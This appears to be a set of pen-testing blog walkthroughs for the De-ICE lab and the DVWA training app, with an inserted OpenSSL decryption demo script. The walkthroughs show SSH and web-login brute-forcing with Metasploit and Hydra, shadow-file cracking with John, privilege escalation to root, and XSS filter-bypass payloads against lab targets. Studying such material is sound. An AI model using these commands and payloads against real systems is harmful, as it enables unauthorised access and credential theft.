1 0.25 ms caps-dh841pm1 (192.168.1.100)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 79.09 seconds

I always start out by looking for low-hanging fruit. Since the FTP service looks to be broken, based on the Nmap scan results, we will look at the Apache website listening on port 80. From the website there are ten possible users.

Marie Mary        marym@herot.net
Pat Patrick       patrickp@herot.net
Terry Thompson    thompsont@herot.net
Ben Benedict      benedictb@herot.net
Erin Gennieg      genniege@herot.net
Paul Michael      michaelp@herot.net
Ester Long        longe@herot.net
Adam Adams        adamsa@herot.net
Bob Banter        banterb@herot.net
Chad Coffee       coffeec@herot.net

This is where it helps to have either been a sys admin or worked at a few different companies. The two most common username conventions I have encountered are <first>.<last>, <first initial><last>. I’ve also had <employee ID>, <first><last initial>, and worst of all <first 4 of last><first 3 of first>. Because the email addresses are <last><first initial> we will use that and also add root to the list because we know it is a Slax Linux host.

root
Marie.Mary
Pat.Patrick
Terry.Thompson
Ben.Benedict
Erin.Gennieg
Paul.Michael
Ester.Long
Adam.Adams
Bob.Banter
Chad.Coffee
marym
patrickp
thompsont
benedictb
genniege
michaelp
longe
adamsa
banterb
coffeec
mmary
ppatrick
tthompson
bbenedict
egennieg
pmichael
elong
aadams
bbanter
ccoffee

I'll use metasploit to do the initial check for weak SSH passwords. You can set your options differently; this is just a simple test.

msfconsole
use auxiliary/scanner/ssh/ssh_login
set BLANK_PASSWORDS true
set RHOSTS 192.168.1.100
set THREADS 4
set USER_FILE /root/Desktop/de-iceUsers.txt
set USER_AS_PASS true
run

Look at that! There is nothing better than a shell and you will never forget the first one you get. Mine was an unpatched BIND 9 DNS server.

[+] SSH - Success: 'bbanter:bbanter' 'uid=1001(bbanter) gid=100(users) groups=100(users) Linux slax 2.6.16 #95 Wed May 17 10:16:21 GMT 2006 i686 pentium2 i386 GNU/Linux '
ssh bbanter@192.168.1.100
bbanter@192.168.1.100's password: 
Linux 2.6.16.
bbanter@slax:~$ who
bbanter pts/0 Apr 12 14:06 (192.168.1.128)

We only have access to the users group right now, so let's see if we can elevate our access manually.

bbanter@slax:~$ cat /etc/group
root::0:root
bin::1:root,bin,daemon
daemon::2:root,bin,daemon
sys::3:root,bin,adm
adm::4:root,adm,daemon
tty::5:
disk::6:root,adm
lp::7:lp
mem::8:
kmem::9:
wheel::10:root
floppy::11:root
mail::12:mail
news::13:news
uucp::14:uucp
man::15:
audio::17:
video::18:
cdrom::19:
games::20:
slocate::21:
utmp::22:
smmsp::25:smmsp
mysql::27:
rpc::32:
sshd::33:sshd
gdm::42:
shadow::43:
ftp::50:
pop::90:pop
scanner::93:
nobody::98:nobody
nogroup::99:
users::100:
console::101:
bbanter@slax:~$ cat /etc/passwd
root:x:0:0:DO NOT CHANGE PASSWORD - WILL BREAK FTP ENCRYPTION:/root:/bin/bash
bin:x:1:1:bin:/bin:
daemon:x:2:2:daemon:/sbin:
adm:x:3:4:adm:/var/log:
lp:x:4:7:lp:/var/spool/lpd:
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/:
news:x:9:13:news:/usr/lib/news:
uucp:x:10:14:uucp:/var/spool/uucppublic:
operator:x:11:0:operator:/root:/bin/bash
games:x:12:100:games:/usr/games:
ftp:x:14:50::/home/ftp:
smmsp:x:25:25:smmsp:/var/spool/clientmqueue:
mysql:x:27:27:MySQL:/var/lib/mysql:/bin/bash
rpc:x:32:32:RPC portmap user:/:/bin/false
sshd:x:33:33:sshd:/:
gdm:x:42:42:GDM:/var/state/gdm:/bin/bash
pop:x:90:90:POP:/:
nobody:x:99:99:nobody:/:
aadams:x:1000:10:,,,:/home/aadams:/bin/bash
bbanter:x:1001:100:,,,:/home/bbanter:/bin/bash
ccoffee:x:1002:100:,,,:/home/ccoffee:/bin/bash

The wheel group is our best bet, since on Linux and Unix systems it is the group whose members are allowed to run the su command. aadams is a member of the wheel group, so we will try to brute force that password, again using metasploit.

set PASS_FILE /usr/share/wordlists/rockyou.txt
set STOP_ON_SUCCESS true
set THREADS 128
set USERNAME aadams
set VERBOSE false
run
****TIME PASSES****
[*] SSH - Starting bruteforce
[+] SSH - Success: 'aadams:nostradamus' 'uid=1000(aadams) gid=10(wheel) groups=10(wheel) Linux slax 2.6.16 #95 Wed May 17 10:16:21 GMT 2006 i686 pentium2 i386 GNU/Linux

We will use the new set of credentials to once again SSH to the system.

aadams@slax:~$ sudo -l

We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:

    #1) Respect the privacy of others.
    #2) Think before you type.
    #3) With great power comes great responsibility.

Password:
User aadams may run the following commands on this host:
    (root) NOEXEC: /bin/ls
    (root) NOEXEC: /usr/bin/cat
    (root) NOEXEC: /usr/bin/more
    (root) NOEXEC: !/usr/bin/su *root*

aadams@slax:~$ sudo cat /etc/shadow
Password:
root:$1$TOi0HE5n$j3obHaAlUdMbHQnJ4Y5Dq0:13553:0:::::
bin:*:9797:0:::::
daemon:*:9797:0:::::
adm:*:9797:0:::::
lp:*:9797:0:::::
sync:*:9797:0:::::
shutdown:*:9797:0:::::
halt:*:9797:0:::::
mail:*:9797:0:::::
news:*:9797:0:::::
uucp:*:9797:0:::::
operator:*:9797:0:::::
games:*:9797:0:::::
ftp:*:9797:0:::::
smmsp:*:9797:0:::::
mysql:*:9797:0:::::
rpc:*:9797:0:::::
sshd:*:9797:0:::::
gdm:*:9797:0:::::
pop:*:9797:0:::::
nobody:*:9797:0:::::
aadams:$1$6cP/ya8m$2CNF8mE.ONyQipxlwjp8P1:13550:0:99999:7:::
bbanter:$1$hl312g8m$Cf9v9OoRN062STzYiWDTh1:13550:0:99999:7:::
ccoffee:$1$nsHnABm3$OHraCR9ro.idCMtEiFPPA.:13550:0:99999:7:::

John the Ripper can directly attack shadow files, so let's try it using the rockyou wordlist. The first run (--single) applies a simple set of rules to look for easy passwords, basically so you don't have to find bbanter again.

john --single de-iceShadow.txt
john --wordlist=/usr/share/wordlists/rockyou.txt de-iceShadow.txt
root:tarot:13553:0:::::
aadams:nostradamus:13550:0:99999:7:::
bbanter:bbanter:13550:0:99999:7:::
ccoffee:hierophant:13550:0:99999:7:::
su -

Now that we are root, let's look for sensitive data on the system.

root@slax:/home# ls
aadams/  bbanter/  ccoffee/  ftp/
root@slax:/home# cd ccoffee
root@slax:/home/ccoffee# ls
root@slax:/home/ccoffee# cd ../ftp
root@slax:/home/ftp# ls
incoming/
root@slax:/home/ftp# cd incoming/
root@slax:/home/ftp/incoming# ls
salary_dec2003.csv.enc*

Huh, .enc? Google that. I bet salary information isn't supposed to be there. Running strings definitely doesn't produce readable results.

root@slax:/home/ftp/incoming# strings salary_dec2003.csv.enc | head -10
Salted__n
Lw$A`
YN>7
#ki8
/><b
Wm&/
KU'M
R|T&
@/CP/
    0"Kt

But try googling the Salted__n and see if you can figure out what we might need to do. First, we need to remember the /etc/passwd entry that noted changing the root password would break the encryption, and second, after some research, we know that it is encrypted using OpenSSL.

root@slax:/home/ftp/incoming# openssl aes-128-cbc -d -in salary_dec2003.csv.enc -out salary_dec2003.csv
enter aes-128-cbc decryption password:
root@slax:/home/ftp/incoming# strings salary_dec2003.csv | head -10

That is certainly sensitive data! We've got all the flags, time to call it a day.
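
The openssl enc round trip behind both the S1.110 notes (copy.sh with a password file) and the salary file above, as an added example that is not from the original posts or the De-ICE images. It assumes openssl is on PATH; the CSV, passphrase and file names are constructed, and everything lands in a scratch directory under TMPDIR.

```shell
#!/bin/sh
# Added example, not code from the walkthrough or the De-ICE images. It reproduces what
# copy.sh did (encrypt with a passphrase read from a file) on a constructed CSV and shows
# the checks that separate a wrong cipher or digest from the right one.
# Assumes `openssl` on PATH; every file name and value below is constructed.

WORK="${TMPDIR:-/tmp}/enc_demo.$$"
mkdir -p "$WORK"

# Stand-ins for customer_account.csv and /etc/ssl/certs/pw (values are made up).
printf 'name,account,balance\nA. Example,1001,42.00\n' > "$WORK/sample.csv"
printf 'CorrectHorseBattery\n' > "$WORK/pw"

# `openssl enc` derives key and IV from passphrase + random salt with a digest.
# OpenSSL 1.0.x (the De-ICE era) used md5 by default; 1.1.0+ defaults to sha256,
# so a modern box must pass `-md md5` to read those old .enc files.
enc_encrypt() {  # $1 plaintext $2 output $3 cipher $4 digest
  openssl enc "-$3" -md "$4" -salt -in "$1" -out "$2" -pass "file:$WORK/pw" 2>/dev/null
}
enc_decrypt() {  # $1 ciphertext $2 output $3 cipher $4 digest; status comes from openssl
  openssl enc -d "-$3" -md "$4" -in "$1" -out "$2" -pass "file:$WORK/pw" 2>/dev/null
}

# The first 8 bytes of an `openssl enc` file are the literal "Salted__", then the 8-byte
# salt; that header is what `strings` showed at the top of the salary file.
is_openssl_salted() {  # $1 file
  [ "$(head -c 8 "$1" 2>/dev/null)" = "Salted__" ]
}

# Returns 0 only if decrypting with the given cipher/digest restores the original exactly.
restores_original() {  # $1 original $2 ciphertext $3 cipher $4 digest
  out="$WORK/out.$3.$4"
  enc_decrypt "$2" "$out" "$3" "$4" && cmp -s "$1" "$out"
}

enc_encrypt "$WORK/sample.csv" "$WORK/sample.csv.enc" aes-256-cbc md5

if is_openssl_salted "$WORK/sample.csv.enc"; then echo "header: Salted__ present"; fi
# Right cipher and digest: the plaintext comes back byte for byte.
restores_original "$WORK/sample.csv" "$WORK/sample.csv.enc" aes-256-cbc md5 \
  && echo "aes-256-cbc/md5: decrypted OK"
# Wrong cipher (the first attempt in the S1.110 notes) or wrong KDF digest gives
# "bad decrypt" or garbage, never the original: the NO JOY case.
restores_original "$WORK/sample.csv" "$WORK/sample.csv.enc" aes-128-cbc md5 \
  || echo "aes-128-cbc/md5: no joy"
restores_original "$WORK/sample.csv" "$WORK/sample.csv.enc" aes-256-cbc sha256 \
  || echo "aes-256-cbc/sha256: no joy (wrong KDF digest)"
```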

The assumption is that you are here because you are either trying to learn about web app pen testing or you are stuck on one of the challenges. Everyone has their own way that they like to approach web applications. This is mine. We will end up at the same place so don’t get too hung up on style, focus on content.

All of the posts here are spoilers

To setup for all of the different challenges in DVWA you need to set the security level. This is relatively simple, just click the DVWA Security button and set the level through the interface.

Set Security Level

XSS Reflected – Low

I have security set to low and I have clicked on the XSS Reflected button. Nice test box huh? Well now what are you going to do? I like to jump right in and start stuffing things in there. No foreplay or anything.

HTML Injection Test

Why didn't I go right for an alert('XSS')? I like to see if HTML injection is possible at the same time. Feel free to skip that step and go straight to <script>alert("XSS")</script>. Look at that! HTML injection is possible. Let us go back and see if we can get a script to run.

HTML Injection Success

XSS Script Success

TL;DR <script>alert("XSS")</script>

XSS Reflected – Medium

Set the DVWA Security to Medium and throw that script back in there.

Medium XSS Failure

Why didn't that work? Time to dig into the page source. If you read the PHP by clicking on the View Source button, the function first checks for a null string and then replaces the string <script> with '' if it is found. That is super effective against tools or testers that only use the exact string <script>. If you change it up a bit with capitalization, <SCRipT> or <ScriPt>, it doesn't match and str_replace just passes it through. The PHP function is case sensitive but HTML tag names are not.

PHP Function

TL;DR <SCRipt>alert("XSS")</scrIPT>

XSS Reflected – High

The High challenge uses the PHP htmlspecialchars() function to escape special characters. I have tried to encode the string in multiple ways and have not figured out a way to run a script. This is the correct way to handle user input; it might be breakable, but I haven't found a way around it yet.

Normally, I use Burp Suite to do everything because it does everything. That is because I have the pro version. If you have the community version you know that some of the attacks are throttled and the vulnerability scanner just doesn’t exist. If you don’t have the pro version of Burp or just want to try a different toolset this tutorial will take you through attacking the initial login page of the Damn Vulnerable Web App (DVWA site, DVWA ISO).

Once the application is up and running you will be presented with the initial page.

DVWA Login Page

Home page for DVWA

Now what? You can either skip to the bottom and find it or we can brute-force the password and learn something. First thing we need to do is figure out what to attack. The easiest way is to look at the source code for the page.

Source Review

A second way is to capture a request to the page using a proxy; in keeping with the spirit of not using Burp, I grabbed this one using OWASP ZAP.

Zap Proxy Request Capture

The three fields are username, password, and Login. The next crucial piece is knowing what a bad login displays. This gives Hydra a way of discriminating between valid and bad login attempts.

Failed DVWA Login

I'm going to use xHydra but will give the command to run Hydra from a shell if that is the only access you have on a system. Launch xHydra; on Kali Linux it is under the /usr/bin directory. The following images show all of the options being set.

OWASP Target Setup

Set the IP of the DVWA server and the protocol in use, for this we are attacking the web form so http-post-form. To attack a login of any type you need two other things, a username and a password. The rockyou word list exists at /usr/share/wordlists. I created a short list of usernames to use also.

User List

User Name and Password for Hydra

The next step is to tune the brute force attack. I can use 32 threads and a 1 second timeout because both of the virtual machines, a Kali Linux attacker and the DVWA target, are on the same local LAN segment and there is no concern of causing a denial of service. Also, piping the attack through the Zap proxy is optional and not necessary.

Hydra Tuning

The next tab is where all of the heavy lifting happens. The http / https url field contains the ':' separated string /login.php:username=^USER^&password=^PASS^&Login=Login:Login failed. Breaking out the string, /login.php is the login page. The username and password fields are linked to the ^USER^ and ^PASS^ variables; these are the options set in the Passwords tab. The Login field is not linked to a variable but is used in the login string that we found in image 3. The last string, Login failed, is what we determined indicates a bad attempt.

Hydra HTTP Setup

Once you are all set to go just click Start on the last tab and watch it go. If you look really closely at password setup you’ll see that I cheated a bit and just ran a single password. I started running the rockyou wordlist and then realized that it would take a significant amount of time to complete.

Brute Force Success

To run this from a shell instead of the GUI use:

hydra -L UserNameFile -P PasswordFile -e ns -t 32 -u -f -m "/login.php:username=^USER^&password=^PASS^&Login=Login:Login failed" <IP> http-post-form

-e ns checks for passwords that are the same as the username (s) and null (n)

-f exits after the first pair is found

-u is supposed to make the attack faster according to their readme but it doesn’t really say how. I think that it is a unique switch but I don’t have any proof.

Stay tuned for more DVWA updates on the challenges you now have access to since you brute forced this password.